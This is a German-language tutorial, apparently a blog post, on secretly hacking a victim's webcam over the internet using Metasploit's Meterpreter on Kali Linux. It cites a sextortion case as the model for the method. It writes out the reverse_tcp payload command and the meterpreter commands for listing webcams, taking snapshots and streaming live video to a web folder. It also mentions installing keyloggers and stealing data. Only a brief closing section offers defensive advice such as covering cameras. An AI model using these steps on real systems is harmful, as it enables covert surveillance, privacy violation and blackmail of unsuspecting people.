In diesem Tutorial werfen wir einen Blick darauf, wie wir uns heimlich und remote über das Internet in eine Webcam hacken und einen Blick darauf werfen können, was auf der anderen Seite vor sich geht. Wir werden den leistungsstarken Meterpreter und Kali Linux verwenden, um uns in die Webcam des Opfers zu hacken. Wir übernehmen die volle Kontrolle über die Webcam, schalten sie ein, machen Schnappschüsse und streamen sogar Live-Videos, ohne dass es jemand herausfindet.
Anfang 2014 wurde ein Hacker zu 18 Monaten verurteilt, weil er genau dies bei Miss Teen USA 2013 getan hatte. Er fand eine Sicherheitslücke in ihrem Computer (wie einige veraltete Software), nahm ein paar kompromittierende Fotos von der Webcam und erpresste das Opfer, um weitere Fotos zu senden. Die Methode, die er verwendet hat, ist genau das, was wir hier ausprobieren werden.
Unser bester Freund meterpreter
wird uns bei diesem Hack helfen. Mit Meterpreter können wir die Webcam einer Person steuern, einen Keylogger installieren oder Ihre eigenen Viren pflanzen, private Daten stehlen und so ziemlich alles auf dem Computer des Opfers tun.
Für dieses Tutorial gehe ich davon aus, dass Sie bereits ein Angriffsmodul verwendet haben, um eine Sicherheitsanfälligkeit mit Metasploit auszunutzen (Wie geht das?). Jetzt kommen wir dazu.
Wie kann man Webcams hacken?
Schritt 1: meterpreter einrichten.
Nachdem wir das Opfer erfolgreich ausgenutzt haben, haben wir nun die Möglichkeit, eine Nutzlast unserer Wahl festzulegen. Die Nutzlast teilt metasploit mit, was auf dem Computer des Opfers zu tun ist, sobald es einbricht. Meterpreter ist unsere Nutzlast. Der folgende Befehl richtet unsere Nutzlast ein:
set payload windows/meterpreter/reverse_tcp
Wenn der Angriff erfolgreich war, installiert metasploit automatisch meterpreter auf dem Zielsystem und wir können mit dem Hacken der Webcam fortfahren.
Schritt 2: Suchen Sie die Webcam.
Meterpreter verfügt über ein integriertes Modul zum Suchen und Steuern der Webcam des Remote-Systems. Wir können beginnen, indem wir suchen, ob das System sogar eine Webcam hat oder not.me . Der folgende Befehl wird dafür verwendet, er gibt uns auch den Namen der Webcam zurück.
meterpreter > webcam_list
Und nun sollten die Webcam(s) Ihres Ziels in der Ausgabe aufgelistet werden.
Schritt 3: Schnappschüsse machen
Wenn uns der letzte Befehl eine Webcam gegeben hat, können wir ein Foto machen:
meterpreter > webcam_snap
Und jetzt sollten Sie sehen, dass ein Bild im Ordner gespeichert wurde /opt/framework3/msf3
Gehen Sie einfach dorthin
Schritt 4: Streamen Sie Echtzeitvideos von der gehackten Webcam
Also haben wir gerade ein Foto gemacht, mal sehen, wie man einen Live-Videostream bekommt. Wir können dies tun, indem Sie den folgenden Befehl eingeben: (Wir verwenden den Parameter –p
, um das Verzeichnis anzugeben, das wir der Video-Streaming-Datei geben möchten)
meterpreter > run webcam -p /var/www
Dieser Befehl startet die Webcam des Opfers und sendet seine Videoausgabe an /var/www/webcam.htm
. Sie können diese Datei öffnen und überprüfen, was am anderen Ende in einem Live-Videostream vor sich geht.
Wie kann man verhindern, dass die eigene Webcam gehackt wird?
Es gibt mehrere Möglichkeiten, sich in Webcams zu hacken. Im obigen Beispiel können wir mit nur wenigen kleinen Befehlen in die Webcam unseres Opfers schauen. Jeder erfahrene Sicherheitsexperte wird Ihnen sagen, dass kein System vollständig sicher ist. Aus diesem Grund sollten Sie Ihre Kameras immer abgedeckt halten, wenn Sie sie nicht verwenden. Persönlich benutze ich dieses kleine Gadget sowohl auf meinem Laptop als auch auf meinem Smartphone.
Dies bedeutet jedoch nicht, dass Sie sich nicht die Mühe machen sollten, Ihr Betriebssystem und Ihre Anwendungen auf dem neuesten Stand zu halten, ganz im Gegenteil. Wenn ein Hacker die Kontrolle über Ihre Webcam erlangen kann, wurde Ihr System erfolgreich ausgenutzt, es ist effektiv jetzt ein Bot, ein Sklave des Angreifers. Dies bedeutet, dass der Angreifer alles auf Ihrem System tun kann: Auf Ihre privaten Daten zugreifen, alles sehen, was Sie eingeben, sowie alle Websites, die Sie besuchen.
Welches Gerät benutzt du gerade? Ein Smartphone? Ein Laptop? Die Chancen stehen gut, dass Sie direkt in eine Kamera starren. Fühlst du dich plötzlich ein wenig unwohl? Das solltest du. Gehen Sie kein Risiko ein. Wenn Sie einfach Ihre Kameras vertuschen und routinemäßig Ihre gesamte Software aktualisieren, können Sie vermeiden, selbst Opfer eines Webcam-Hacks zu werden.